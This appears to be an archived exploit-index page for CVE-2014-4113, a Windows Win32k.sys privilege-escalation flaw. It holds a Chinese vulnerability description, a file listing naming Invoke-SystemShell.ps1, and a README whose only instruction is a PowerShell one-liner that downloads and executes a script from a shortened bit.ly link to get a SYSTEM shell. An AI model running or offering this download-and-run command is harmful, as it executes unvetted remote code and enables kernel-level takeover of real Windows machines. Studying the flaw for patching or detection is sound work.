Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2014-4113 PoC — Microsoft Windows Win32k.sys 特权提升漏洞

Source
Associated Vulnerability
Title:Microsoft Windows Win32k.sys 特权提升漏洞 (CVE-2014-4113)
Description:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后台控制窗口和屏幕输出管理等。 如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。
Description
PowerShell CVE-2014-4113
Readme
CVE-2014-4113
=============

PowerShell CVE-2014-4113

x64 Windows Only

iex (New-Object Net.WebClient).DownloadString('http://bit.ly/1qosbJH')

File Snapshot

[4.0K] /data/pocs/b9b03c7fd62c08f456f3d0e7a0a3c64cca9f9dee ├── [256K] Invoke-SystemShell.ps1 └── [ 145] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.